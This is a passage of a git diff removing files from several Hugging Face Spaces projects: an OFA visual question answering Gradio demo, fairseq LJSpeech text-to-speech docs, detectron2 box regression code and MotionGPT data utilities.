base_architecture(args) diff --git a/spaces/OFA-Sys/OFA-vqa/app.py b/spaces/OFA-Sys/OFA-vqa/app.py deleted file mode 100644 index 89695235049069a40f276540ca74beaae0b7bfdc..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/app.py +++ /dev/null @@ -1,153 +0,0 @@ -import os - -os.system('cd fairseq;' - 'pip install ./; cd ..') -os.system('ls -l') - -import torch -import numpy as np -import re -from fairseq import utils,tasks -from fairseq import checkpoint_utils -from fairseq import distributed_utils, options, tasks, utils -from fairseq.dataclass.utils import convert_namespace_to_omegaconf -from utils.zero_shot_utils import zero_shot_step -from tasks.mm_tasks.vqa_gen import VqaGenTask -from models.ofa import OFAModel -from PIL import Image -from torchvision import transforms -import gradio as gr - -# Register VQA task -tasks.register_task('vqa_gen',VqaGenTask) -# turn on cuda if GPU is available -use_cuda = torch.cuda.is_available() -# use fp16 only when GPU is available -use_fp16 = False - -os.system('wget https://ofa-silicon.oss-us-west-1.aliyuncs.com/checkpoints/ofa_large_384.pt; ' - 'mkdir -p checkpoints; mv ofa_large_384.pt checkpoints/ofa_large_384.pt') - -# specify some options for evaluation -parser = options.get_generation_parser() -input_args = ["", "--task=vqa_gen", "--beam=100", "--unnormalized", "--path=checkpoints/ofa_large_384.pt", "--bpe-dir=utils/BPE"] -args = options.parse_args_and_arch(parser, input_args) -cfg = convert_namespace_to_omegaconf(args) - -# Load pretrained ckpt & config -task = tasks.setup_task(cfg.task) -models, cfg = checkpoint_utils.load_model_ensemble( - utils.split_paths(cfg.common_eval.path), - task=task -) - -# Move models to GPU -for model in models: - model.eval() - if use_fp16: - model.half() - if use_cuda and not cfg.distributed_training.pipeline_model_parallel: - model.cuda() - model.prepare_for_inference_(cfg) - -# Initialize generator -generator = task.build_generator(models, cfg.generation) - -# Image 
transform -from torchvision import transforms -mean = [0.5, 0.5, 0.5] -std = [0.5, 0.5, 0.5] - -patch_resize_transform = transforms.Compose([ - lambda image: image.convert("RGB"), - transforms.Resize((cfg.task.patch_image_size, cfg.task.patch_image_size), interpolation=Image.BICUBIC), - transforms.ToTensor(), - transforms.Normalize(mean=mean, std=std), -]) - -# Text preprocess -bos_item = torch.LongTensor([task.src_dict.bos()]) -eos_item = torch.LongTensor([task.src_dict.eos()]) -pad_idx = task.src_dict.pad() - -# Normalize the question -def pre_question(question, max_ques_words): - question = question.lower().lstrip(",.!?*#:;~").replace('-', ' ').replace('/', ' ') - question = re.sub( - r"\s{2,}", - ' ', - question, - ) - question = question.rstrip('\n') - question = question.strip(' ') - # truncate question - question_words = question.split(' ') - if len(question_words) > max_ques_words: - question = ' '.join(question_words[:max_ques_words]) - return question - -def encode_text(text, length=None, append_bos=False, append_eos=False): - s = task.tgt_dict.encode_line( - line=task.bpe.encode(text), - add_if_not_exist=False, - append_eos=False - ).long() - if length is not None: - s = s[:length] - if append_bos: - s = torch.cat([bos_item, s]) - if append_eos: - s = torch.cat([s, eos_item]) - return s - -# Construct input for open-domain VQA task -def construct_sample(image: Image, question: str): - patch_image = patch_resize_transform(image).unsqueeze(0) - patch_mask = torch.tensor([True]) - - question = pre_question(question, task.cfg.max_src_length) - question = question + '?' 
if not question.endswith('?') else question - src_text = encode_text(' {}'.format(question), append_bos=True, append_eos=True).unsqueeze(0) - - src_length = torch.LongTensor([s.ne(pad_idx).long().sum() for s in src_text]) - ref_dict = np.array([{'yes': 1.0}]) # just placeholder - sample = { - "id":np.array(['42']), - "net_input": { - "src_tokens": src_text, - "src_lengths": src_length, - "patch_images": patch_image, - "patch_masks": patch_mask, - }, - "ref_dict": ref_dict, - } - return sample - -# Function to turn FP32 to FP16 -def apply_half(t): - if t.dtype is torch.float32: - return t.to(dtype=torch.half) - return t - - -# Function for image captioning -def open_domain_vqa(Image, Question): - sample = construct_sample(Image, Question) - sample = utils.move_to_cuda(sample) if use_cuda else sample - sample = utils.apply_to_sample(apply_half, sample) if use_fp16 else sample - # Run eval step for open-domain VQA - with torch.no_grad(): - result, scores = zero_shot_step(task, generator, models, sample) - return result[0]['answer'] - - -title = "OFA-Visual_Question_Answering" -description = "Gradio Demo for OFA-Visual_Question_Answering. Upload your own image (high-resolution images are recommended) or click any one of the examples, and click " \ - "\"Submit\" and then wait for OFA's answer. " -article = "

    OFA Github " \ - "Repo

    " -examples = [['cat-4894153_1920.jpg', 'where are the cats?'], ['men-6245003_1920.jpg', 'how many people are in the image?'], ['labrador-retriever-7004193_1920.jpg', 'what breed is the dog in the picture?'], ['Starry_Night.jpeg', 'what style does the picture belong to?']] -io = gr.Interface(fn=open_domain_vqa, inputs=[gr.inputs.Image(type='pil'), "textbox"], outputs=gr.outputs.Textbox(label="Answer"), - title=title, description=description, article=article, examples=examples, - allow_flagging=False, allow_screenshot=False) -io.launch() \ No newline at end of file diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_synthesis/docs/ljspeech_example.md b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_synthesis/docs/ljspeech_example.md deleted file mode 100644 index 90c524fac8ffdc1819ec9bb36928500320337603..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/speech_synthesis/docs/ljspeech_example.md +++ /dev/null @@ -1,138 +0,0 @@ -[[Back]](..) - -# LJSpeech - -[LJSpeech](https://keithito.com/LJ-Speech-Dataset) is a public domain TTS -corpus with around 24 hours of English speech sampled at 22.05kHz. We provide examples for building -[Transformer](https://arxiv.org/abs/1809.08895) and [FastSpeech 2](https://arxiv.org/abs/2006.04558) -models on this dataset. - - -## Data preparation - -Download data, create splits and generate audio manifests with -```bash -python -m examples.speech_synthesis.preprocessing.get_ljspeech_audio_manifest \ - --output-data-root ${AUDIO_DATA_ROOT} \ - --output-manifest-root ${AUDIO_MANIFEST_ROOT} -``` - -Then, extract log-Mel spectrograms, generate feature manifest and create data configuration YAML with -```bash -python -m examples.speech_synthesis.preprocessing.get_feature_manifest \ - --audio-manifest-root ${AUDIO_MANIFEST_ROOT} \ - --output-root ${FEATURE_MANIFEST_ROOT} \ - --ipa-vocab --use-g2p -``` -where we use phoneme inputs (`--ipa-vocab --use-g2p`) as example. 
- -FastSpeech 2 additionally requires frame durations, pitch and energy as auxiliary training targets. -Add `--add-fastspeech-targets` to include these fields in the feature manifests. We get frame durations either from -phoneme-level force-alignment or frame-level pseudo-text unit sequence. They should be pre-computed and specified via: -- `--textgrid-zip ${TEXT_GRID_ZIP_PATH}` for a ZIP file, inside which there is one - [TextGrid](https://www.fon.hum.uva.nl/praat/manual/TextGrid.html) file per sample to provide force-alignment info. -- `--id-to-units-tsv ${ID_TO_UNIT_TSV}` for a TSV file, where there are 2 columns for sample ID and - space-delimited pseudo-text unit sequence, respectively. - -For your convenience, we provide pre-computed -[force-alignment](https://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_mfa.zip) from -[Montreal Forced Aligner](https://github.com/MontrealCorpusTools/Montreal-Forced-Aligner) and -[pseudo-text units](s3://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_hubert.tsv) from -[HuBERT](https://github.com/pytorch/fairseq/tree/main/examples/hubert). You can also generate them by yourself using -a different software or model. - - -## Training -#### Transformer -```bash -fairseq-train ${FEATURE_MANIFEST_ROOT} --save-dir ${SAVE_DIR} \ - --config-yaml config.yaml --train-subset train --valid-subset dev \ - --num-workers 4 --max-tokens 30000 --max-update 200000 \ - --task text_to_speech --criterion tacotron2 --arch tts_transformer \ - --clip-norm 5.0 --n-frames-per-step 4 --bce-pos-weight 5.0 \ - --dropout 0.1 --attention-dropout 0.1 --activation-dropout 0.1 \ - --encoder-normalize-before --decoder-normalize-before \ - --optimizer adam --lr 2e-3 --lr-scheduler inverse_sqrt --warmup-updates 4000 \ - --seed 1 --update-freq 8 --eval-inference --best-checkpoint-metric mcd_loss -``` -where `SAVE_DIR` is the checkpoint root path. We set `--update-freq 8` to simulate 8 GPUs with 1 GPU. You may want to -update it accordingly when using more than 1 GPU. 
- -#### FastSpeech2 -```bash -fairseq-train ${FEATURE_MANIFEST_ROOT} --save-dir ${SAVE_DIR} \ - --config-yaml config.yaml --train-subset train --valid-subset dev \ - --num-workers 4 --max-sentences 6 --max-update 200000 \ - --task text_to_speech --criterion fastspeech2 --arch fastspeech2 \ - --clip-norm 5.0 --n-frames-per-step 1 \ - --dropout 0.1 --attention-dropout 0.1 --activation-dropout 0.1 \ - --encoder-normalize-before --decoder-normalize-before \ - --optimizer adam --lr 5e-4 --lr-scheduler inverse_sqrt --warmup-updates 4000 \ - --seed 1 --update-freq 8 --eval-inference --best-checkpoint-metric mcd_loss -``` - - -## Inference -Average the last 5 checkpoints, generate the test split spectrogram and waveform using the default Griffin-Lim vocoder: -```bash -SPLIT=test -CHECKPOINT_NAME=avg_last_5 -CHECKPOINT_PATH=${SAVE_DIR}/checkpoint_${CHECKPOINT_NAME}.pt -python scripts/average_checkpoints.py --inputs ${SAVE_DIR} \ - --num-epoch-checkpoints 5 \ - --output ${CHECKPOINT_PATH} - -python -m examples.speech_synthesis.generate_waveform ${FEATURE_MANIFEST_ROOT} \ - --config-yaml config.yaml --gen-subset ${SPLIT} --task text_to_speech \ - --path ${CHECKPOINT_PATH} --max-tokens 50000 --spec-bwd-max-iter 32 \ - --dump-waveforms -``` -which dumps files (waveform, feature, attention plot, etc.) to `${SAVE_DIR}/generate-${CHECKPOINT_NAME}-${SPLIT}`. To -re-synthesize target waveforms for automatic evaluation, add `--dump-target`. - -## Automatic Evaluation -To start with, generate the manifest for synthetic speech, which will be taken as inputs by evaluation scripts. 
-```bash -python -m examples.speech_synthesis.evaluation.get_eval_manifest \ - --generation-root ${SAVE_DIR}/generate-${CHECKPOINT_NAME}-${SPLIT} \ - --audio-manifest ${AUDIO_MANIFEST_ROOT}/${SPLIT}.audio.tsv \ - --output-path ${EVAL_OUTPUT_ROOT}/eval.tsv \ - --vocoder griffin_lim --sample-rate 22050 --audio-format flac \ - --use-resynthesized-target -``` -Speech recognition (ASR) models usually operate at lower sample rates (e.g. 16kHz). For the WER/CER metric, -you may need to resample the audios accordingly --- add `--output-sample-rate 16000` for `generate_waveform.py` and -use `--sample-rate 16000` for `get_eval_manifest.py`. - - -#### WER/CER metric -We use wav2vec 2.0 ASR model as example. [Download](https://github.com/pytorch/fairseq/tree/main/examples/wav2vec) -the model checkpoint and dictionary, then compute WER/CER with -```bash -python -m examples.speech_synthesis.evaluation.eval_asr \ - --audio-header syn --text-header text --err-unit char --split ${SPLIT} \ - --w2v-ckpt ${WAV2VEC2_CHECKPOINT_PATH} --w2v-dict-dir ${WAV2VEC2_DICT_DIR} \ - --raw-manifest ${EVAL_OUTPUT_ROOT}/eval_16khz.tsv --asr-dir ${EVAL_OUTPUT_ROOT}/asr -``` - -#### MCD/MSD metric -```bash -python -m examples.speech_synthesis.evaluation.eval_sp \ - ${EVAL_OUTPUT_ROOT}/eval.tsv --mcd --msd -``` - -#### F0 metrics -```bash -python -m examples.speech_synthesis.evaluation.eval_f0 \ - ${EVAL_OUTPUT_ROOT}/eval.tsv --gpe --vde --ffe -``` - - -## Results - -| --arch | Params | Test MCD | Model | -|---|---|---|---| -| tts_transformer | 54M | 3.8 | [Download](https://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_transformer_phn.tar) | -| fastspeech2 | 41M | 3.8 | [Download](https://dl.fbaipublicfiles.com/fairseq/s2/ljspeech_fastspeech2_phn.tar) | - -[[Back]](..) 
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/model_parallel/__init__.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/model_parallel/__init__.py deleted file mode 100644 index 69f21684872f72ae8ee26d9ff7d2d2b6e6d526c3..0000000000000000000000000000000000000000 --- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/model_parallel/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from . import criterions, models, modules # noqa diff --git a/spaces/ORI-Muchim/MarinTTS/export_model.py b/spaces/ORI-Muchim/MarinTTS/export_model.py deleted file mode 100644 index 98a49835df5a7a2486e76ddf94fbbb4444b52203..0000000000000000000000000000000000000000 --- a/spaces/ORI-Muchim/MarinTTS/export_model.py +++ /dev/null @@ -1,13 +0,0 @@ -import torch - -if __name__ == '__main__': - model_path = "saved_model/11/model.pth" - output_path = "saved_model/11/model1.pth" - checkpoint_dict = torch.load(model_path, map_location='cpu') - checkpoint_dict_new = {} - for k, v in checkpoint_dict.items(): - if k == "optimizer": - print("remove optimizer") - continue - checkpoint_dict_new[k] = v - torch.save(checkpoint_dict_new, output_path) diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/detectron2/modeling/box_regression.py b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/detectron2/modeling/box_regression.py deleted file mode 100644 index b24c123f26faa5f17975fe13b6756151da229b2f..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/detectron2/modeling/box_regression.py +++ /dev/null @@ -1,369 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-import math -from typing import List, Tuple, Union -import torch -from fvcore.nn import giou_loss, smooth_l1_loss -from torch.nn import functional as F - -from detectron2.layers import cat, ciou_loss, diou_loss -from detectron2.structures import Boxes - -# Value for clamping large dw and dh predictions. The heuristic is that we clamp -# such that dw and dh are no larger than what would transform a 16px box into a -# 1000px box (based on a small anchor, 16px, and a typical image size, 1000px). -_DEFAULT_SCALE_CLAMP = math.log(1000.0 / 16) - - -__all__ = ["Box2BoxTransform", "Box2BoxTransformRotated", "Box2BoxTransformLinear"] - - -@torch.jit.script -class Box2BoxTransform(object): - """ - The box-to-box transform defined in R-CNN. The transformation is parameterized - by 4 deltas: (dx, dy, dw, dh). The transformation scales the box's width and height - by exp(dw), exp(dh) and shifts a box's center by the offset (dx * width, dy * height). - """ - - def __init__( - self, weights: Tuple[float, float, float, float], scale_clamp: float = _DEFAULT_SCALE_CLAMP - ): - """ - Args: - weights (4-element tuple): Scaling factors that are applied to the - (dx, dy, dw, dh) deltas. In Fast R-CNN, these were originally set - such that the deltas have unit variance; now they are treated as - hyperparameters of the system. - scale_clamp (float): When predicting deltas, the predicted box scaling - factors (dw and dh) are clamped such that they are <= scale_clamp. - """ - self.weights = weights - self.scale_clamp = scale_clamp - - def get_deltas(self, src_boxes, target_boxes): - """ - Get box regression transformation deltas (dx, dy, dw, dh) that can be used - to transform the `src_boxes` into the `target_boxes`. That is, the relation - ``target_boxes == self.apply_deltas(deltas, src_boxes)`` is true (unless - any delta is too large and is clamped). 
- - Args: - src_boxes (Tensor): source boxes, e.g., object proposals - target_boxes (Tensor): target of the transformation, e.g., ground-truth - boxes. - """ - assert isinstance(src_boxes, torch.Tensor), type(src_boxes) - assert isinstance(target_boxes, torch.Tensor), type(target_boxes) - - src_widths = src_boxes[:, 2] - src_boxes[:, 0] - src_heights = src_boxes[:, 3] - src_boxes[:, 1] - src_ctr_x = src_boxes[:, 0] + 0.5 * src_widths - src_ctr_y = src_boxes[:, 1] + 0.5 * src_heights - - target_widths = target_boxes[:, 2] - target_boxes[:, 0] - target_heights = target_boxes[:, 3] - target_boxes[:, 1] - target_ctr_x = target_boxes[:, 0] + 0.5 * target_widths - target_ctr_y = target_boxes[:, 1] + 0.5 * target_heights - - wx, wy, ww, wh = self.weights - dx = wx * (target_ctr_x - src_ctr_x) / src_widths - dy = wy * (target_ctr_y - src_ctr_y) / src_heights - dw = ww * torch.log(target_widths / src_widths) - dh = wh * torch.log(target_heights / src_heights) - - deltas = torch.stack((dx, dy, dw, dh), dim=1) - assert (src_widths > 0).all().item(), "Input boxes to Box2BoxTransform are not valid!" - return deltas - - def apply_deltas(self, deltas, boxes): - """ - Apply transformation `deltas` (dx, dy, dw, dh) to `boxes`. - - Args: - deltas (Tensor): transformation deltas of shape (N, k*4), where k >= 1. - deltas[i] represents k potentially different class-specific - box transformations for the single box boxes[i]. 
- boxes (Tensor): boxes to transform, of shape (N, 4) - """ - deltas = deltas.float() # ensure fp32 for decoding precision - boxes = boxes.to(deltas.dtype) - - widths = boxes[:, 2] - boxes[:, 0] - heights = boxes[:, 3] - boxes[:, 1] - ctr_x = boxes[:, 0] + 0.5 * widths - ctr_y = boxes[:, 1] + 0.5 * heights - - wx, wy, ww, wh = self.weights - dx = deltas[:, 0::4] / wx - dy = deltas[:, 1::4] / wy - dw = deltas[:, 2::4] / ww - dh = deltas[:, 3::4] / wh - - # Prevent sending too large values into torch.exp() - dw = torch.clamp(dw, max=self.scale_clamp) - dh = torch.clamp(dh, max=self.scale_clamp) - - pred_ctr_x = dx * widths[:, None] + ctr_x[:, None] - pred_ctr_y = dy * heights[:, None] + ctr_y[:, None] - pred_w = torch.exp(dw) * widths[:, None] - pred_h = torch.exp(dh) * heights[:, None] - - x1 = pred_ctr_x - 0.5 * pred_w - y1 = pred_ctr_y - 0.5 * pred_h - x2 = pred_ctr_x + 0.5 * pred_w - y2 = pred_ctr_y + 0.5 * pred_h - pred_boxes = torch.stack((x1, y1, x2, y2), dim=-1) - return pred_boxes.reshape(deltas.shape) - - -@torch.jit.script -class Box2BoxTransformRotated(object): - """ - The box-to-box transform defined in Rotated R-CNN. The transformation is parameterized - by 5 deltas: (dx, dy, dw, dh, da). The transformation scales the box's width and height - by exp(dw), exp(dh), shifts a box's center by the offset (dx * width, dy * height), - and rotate a box's angle by da (radians). - Note: angles of deltas are in radians while angles of boxes are in degrees. - """ - - def __init__( - self, - weights: Tuple[float, float, float, float, float], - scale_clamp: float = _DEFAULT_SCALE_CLAMP, - ): - """ - Args: - weights (5-element tuple): Scaling factors that are applied to the - (dx, dy, dw, dh, da) deltas. These are treated as - hyperparameters of the system. - scale_clamp (float): When predicting deltas, the predicted box scaling - factors (dw and dh) are clamped such that they are <= scale_clamp. 
- """ - self.weights = weights - self.scale_clamp = scale_clamp - - def get_deltas(self, src_boxes, target_boxes): - """ - Get box regression transformation deltas (dx, dy, dw, dh, da) that can be used - to transform the `src_boxes` into the `target_boxes`. That is, the relation - ``target_boxes == self.apply_deltas(deltas, src_boxes)`` is true (unless - any delta is too large and is clamped). - - Args: - src_boxes (Tensor): Nx5 source boxes, e.g., object proposals - target_boxes (Tensor): Nx5 target of the transformation, e.g., ground-truth - boxes. - """ - assert isinstance(src_boxes, torch.Tensor), type(src_boxes) - assert isinstance(target_boxes, torch.Tensor), type(target_boxes) - - src_ctr_x, src_ctr_y, src_widths, src_heights, src_angles = torch.unbind(src_boxes, dim=1) - - target_ctr_x, target_ctr_y, target_widths, target_heights, target_angles = torch.unbind( - target_boxes, dim=1 - ) - - wx, wy, ww, wh, wa = self.weights - dx = wx * (target_ctr_x - src_ctr_x) / src_widths - dy = wy * (target_ctr_y - src_ctr_y) / src_heights - dw = ww * torch.log(target_widths / src_widths) - dh = wh * torch.log(target_heights / src_heights) - # Angles of deltas are in radians while angles of boxes are in degrees. - # the conversion to radians serve as a way to normalize the values - da = target_angles - src_angles - da = (da + 180.0) % 360.0 - 180.0 # make it in [-180, 180) - da *= wa * math.pi / 180.0 - - deltas = torch.stack((dx, dy, dw, dh, da), dim=1) - assert ( - (src_widths > 0).all().item() - ), "Input boxes to Box2BoxTransformRotated are not valid!" - return deltas - - def apply_deltas(self, deltas, boxes): - """ - Apply transformation `deltas` (dx, dy, dw, dh, da) to `boxes`. - - Args: - deltas (Tensor): transformation deltas of shape (N, k*5). - deltas[i] represents box transformation for the single box boxes[i]. 
- boxes (Tensor): boxes to transform, of shape (N, 5) - """ - assert deltas.shape[1] % 5 == 0 and boxes.shape[1] == 5 - - boxes = boxes.to(deltas.dtype).unsqueeze(2) - - ctr_x = boxes[:, 0] - ctr_y = boxes[:, 1] - widths = boxes[:, 2] - heights = boxes[:, 3] - angles = boxes[:, 4] - - wx, wy, ww, wh, wa = self.weights - - dx = deltas[:, 0::5] / wx - dy = deltas[:, 1::5] / wy - dw = deltas[:, 2::5] / ww - dh = deltas[:, 3::5] / wh - da = deltas[:, 4::5] / wa - - # Prevent sending too large values into torch.exp() - dw = torch.clamp(dw, max=self.scale_clamp) - dh = torch.clamp(dh, max=self.scale_clamp) - - pred_boxes = torch.zeros_like(deltas) - pred_boxes[:, 0::5] = dx * widths + ctr_x # x_ctr - pred_boxes[:, 1::5] = dy * heights + ctr_y # y_ctr - pred_boxes[:, 2::5] = torch.exp(dw) * widths # width - pred_boxes[:, 3::5] = torch.exp(dh) * heights # height - - # Following original RRPN implementation, - # angles of deltas are in radians while angles of boxes are in degrees. - pred_angle = da * 180.0 / math.pi + angles - pred_angle = (pred_angle + 180.0) % 360.0 - 180.0 # make it in [-180, 180) - - pred_boxes[:, 4::5] = pred_angle - - return pred_boxes - - -class Box2BoxTransformLinear(object): - """ - The linear box-to-box transform defined in FCOS. The transformation is parameterized - by the distance from the center of (square) src box to 4 edges of the target box. - """ - - def __init__(self, normalize_by_size=True): - """ - Args: - normalize_by_size: normalize deltas by the size of src (anchor) boxes. - """ - self.normalize_by_size = normalize_by_size - - def get_deltas(self, src_boxes, target_boxes): - """ - Get box regression transformation deltas (dx1, dy1, dx2, dy2) that can be used - to transform the `src_boxes` into the `target_boxes`. That is, the relation - ``target_boxes == self.apply_deltas(deltas, src_boxes)`` is true. - The center of src must be inside target boxes. 
- - Args: - src_boxes (Tensor): square source boxes, e.g., anchors - target_boxes (Tensor): target of the transformation, e.g., ground-truth - boxes. - """ - assert isinstance(src_boxes, torch.Tensor), type(src_boxes) - assert isinstance(target_boxes, torch.Tensor), type(target_boxes) - - src_ctr_x = 0.5 * (src_boxes[:, 0] + src_boxes[:, 2]) - src_ctr_y = 0.5 * (src_boxes[:, 1] + src_boxes[:, 3]) - - target_l = src_ctr_x - target_boxes[:, 0] - target_t = src_ctr_y - target_boxes[:, 1] - target_r = target_boxes[:, 2] - src_ctr_x - target_b = target_boxes[:, 3] - src_ctr_y - - deltas = torch.stack((target_l, target_t, target_r, target_b), dim=1) - if self.normalize_by_size: - stride_w = src_boxes[:, 2] - src_boxes[:, 0] - stride_h = src_boxes[:, 3] - src_boxes[:, 1] - strides = torch.stack([stride_w, stride_h, stride_w, stride_h], axis=1) - deltas = deltas / strides - - return deltas - - def apply_deltas(self, deltas, boxes): - """ - Apply transformation `deltas` (dx1, dy1, dx2, dy2) to `boxes`. - - Args: - deltas (Tensor): transformation deltas of shape (N, k*4), where k >= 1. - deltas[i] represents k potentially different class-specific - box transformations for the single box boxes[i]. - boxes (Tensor): boxes to transform, of shape (N, 4) - """ - # Ensure the output is a valid box. 
See Sec 2.1 of https://arxiv.org/abs/2006.09214 - deltas = F.relu(deltas) - boxes = boxes.to(deltas.dtype) - - ctr_x = 0.5 * (boxes[:, 0] + boxes[:, 2]) - ctr_y = 0.5 * (boxes[:, 1] + boxes[:, 3]) - if self.normalize_by_size: - stride_w = boxes[:, 2] - boxes[:, 0] - stride_h = boxes[:, 3] - boxes[:, 1] - strides = torch.stack([stride_w, stride_h, stride_w, stride_h], axis=1) - deltas = deltas * strides - - l = deltas[:, 0::4] - t = deltas[:, 1::4] - r = deltas[:, 2::4] - b = deltas[:, 3::4] - - pred_boxes = torch.zeros_like(deltas) - pred_boxes[:, 0::4] = ctr_x[:, None] - l # x1 - pred_boxes[:, 1::4] = ctr_y[:, None] - t # y1 - pred_boxes[:, 2::4] = ctr_x[:, None] + r # x2 - pred_boxes[:, 3::4] = ctr_y[:, None] + b # y2 - return pred_boxes - - -def _dense_box_regression_loss( - anchors: List[Union[Boxes, torch.Tensor]], - box2box_transform: Box2BoxTransform, - pred_anchor_deltas: List[torch.Tensor], - gt_boxes: List[torch.Tensor], - fg_mask: torch.Tensor, - box_reg_loss_type="smooth_l1", - smooth_l1_beta=0.0, -): - """ - Compute loss for dense multi-level box regression. - Loss is accumulated over ``fg_mask``. - - Args: - anchors: #lvl anchor boxes, each is (HixWixA, 4) - pred_anchor_deltas: #lvl predictions, each is (N, HixWixA, 4) - gt_boxes: N ground truth boxes, each has shape (R, 4) (R = sum(Hi * Wi * A)) - fg_mask: the foreground boolean mask of shape (N, R) to compute loss on - box_reg_loss_type (str): Loss type to use. Supported losses: "smooth_l1", "giou", - "diou", "ciou". - smooth_l1_beta (float): beta parameter for the smooth L1 regression loss. Default to - use L1 loss. 
Only used when `box_reg_loss_type` is "smooth_l1" - """ - if isinstance(anchors[0], Boxes): - anchors = type(anchors[0]).cat(anchors).tensor # (R, 4) - else: - anchors = cat(anchors) - if box_reg_loss_type == "smooth_l1": - gt_anchor_deltas = [box2box_transform.get_deltas(anchors, k) for k in gt_boxes] - gt_anchor_deltas = torch.stack(gt_anchor_deltas) # (N, R, 4) - loss_box_reg = smooth_l1_loss( - cat(pred_anchor_deltas, dim=1)[fg_mask], - gt_anchor_deltas[fg_mask], - beta=smooth_l1_beta, - reduction="sum", - ) - elif box_reg_loss_type == "giou": - pred_boxes = [ - box2box_transform.apply_deltas(k, anchors) for k in cat(pred_anchor_deltas, dim=1) - ] - loss_box_reg = giou_loss( - torch.stack(pred_boxes)[fg_mask], torch.stack(gt_boxes)[fg_mask], reduction="sum" - ) - elif box_reg_loss_type == "diou": - pred_boxes = [ - box2box_transform.apply_deltas(k, anchors) for k in cat(pred_anchor_deltas, dim=1) - ] - loss_box_reg = diou_loss( - torch.stack(pred_boxes)[fg_mask], torch.stack(gt_boxes)[fg_mask], reduction="sum" - ) - elif box_reg_loss_type == "ciou": - pred_boxes = [ - box2box_transform.apply_deltas(k, anchors) for k in cat(pred_anchor_deltas, dim=1) - ] - loss_box_reg = ciou_loss( - torch.stack(pred_boxes)[fg_mask], torch.stack(gt_boxes)[fg_mask], reduction="sum" - ) - else: - raise ValueError(f"Invalid dense box regression loss type '{box_reg_loss_type}'") - return loss_box_reg diff --git a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/dev/packaging/README.md b/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/dev/packaging/README.md deleted file mode 100644 index 0174b7dd528efcaa0fe27d46f40a3866f03e7c41..0000000000000000000000000000000000000000 --- a/spaces/OpenGVLab/InternGPT/iGPT/models/grit_src/third_party/CenterNet2/dev/packaging/README.md +++ /dev/null @@ -1,17 +0,0 @@ - -## To build a cu101 wheel for release: - -``` -$ nvidia-docker run -it --storage-opt "size=20GB" --name pt pytorch/manylinux-cuda101 -# 
inside the container: -# git clone https://github.com/facebookresearch/detectron2/ -# cd detectron2 -# export CU_VERSION=cu101 D2_VERSION_SUFFIX= PYTHON_VERSION=3.7 PYTORCH_VERSION=1.8 -# ./dev/packaging/build_wheel.sh -``` - -## To build all wheels for combinations of CUDA and Python -``` -./dev/packaging/build_all_wheels.sh -./dev/packaging/gen_wheel_index.sh /path/to/wheels -``` diff --git a/spaces/OpenMotionLab/MotionGPT/mGPT/data/utils.py b/spaces/OpenMotionLab/MotionGPT/mGPT/data/utils.py deleted file mode 100644 index 30714ff6562edd5136e93107fea10c25b4449c79..0000000000000000000000000000000000000000 --- a/spaces/OpenMotionLab/MotionGPT/mGPT/data/utils.py +++ /dev/null @@ -1,81 +0,0 @@ -import torch -import rich -import pickle -import numpy as np - - -def lengths_to_mask(lengths): - max_len = max(lengths) - mask = torch.arange(max_len, device=lengths.device).expand( - len(lengths), max_len) < lengths.unsqueeze(1) - return mask - - -# padding to max length in one batch -def collate_tensors(batch): - if isinstance(batch[0], np.ndarray): - batch = [torch.tensor(b).float() for b in batch] - - dims = batch[0].dim() - max_size = [max([b.size(i) for b in batch]) for i in range(dims)] - size = (len(batch), ) + tuple(max_size) - canvas = batch[0].new_zeros(size=size) - for i, b in enumerate(batch): - sub_tensor = canvas[i] - for d in range(dims): - sub_tensor = sub_tensor.narrow(d, 0, b.size(d)) - sub_tensor.add_(b) - return canvas - -def humanml3d_collate(batch): - notnone_batches = [b for b in batch if b is not None] - EvalFlag = False if notnone_batches[0][5] is None else True - - # Sort by text length - if EvalFlag: - notnone_batches.sort(key=lambda x: x[5], reverse=True) - - # Motion only - adapted_batch = { - "motion": - collate_tensors([torch.tensor(b[1]).float() for b in notnone_batches]), - "length": [b[2] for b in notnone_batches], - } - - # Text and motion - if notnone_batches[0][0] is not None: - adapted_batch.update({ - "text": [b[0] for b in 
notnone_batches], - "all_captions": [b[7] for b in notnone_batches], - }) - - # Evaluation related - if EvalFlag: - adapted_batch.update({ - "text": [b[0] for b in notnone_batches], - "word_embs": - collate_tensors( - [torch.tensor(b[3]).float() for b in notnone_batches]), - "pos_ohot": - collate_tensors( - [torch.tensor(b[4]).float() for b in notnone_batches]), - "text_len": - collate_tensors([torch.tensor(b[5]) for b in notnone_batches]), - "tokens": [b[6] for b in notnone_batches], - }) - - # Tasks - if len(notnone_batches[0]) == 9: - adapted_batch.update({"tasks": [b[8] for b in notnone_batches]}) - - return adapted_batch - - -def load_pkl(path, description=None, progressBar=False): - if progressBar: - with rich.progress.open(path, 'rb', description=description) as file: - data = pickle.load(file) - else: - with open(path, 'rb') as file: - data = pickle.load(file) - return data diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/system/vm/trace.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/system/vm/trace.go deleted file mode 100644 index c7df51fae61bbedf43545367a744dc8b1ad73e21..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/system/vm/trace.go and /dev/null differ diff --git 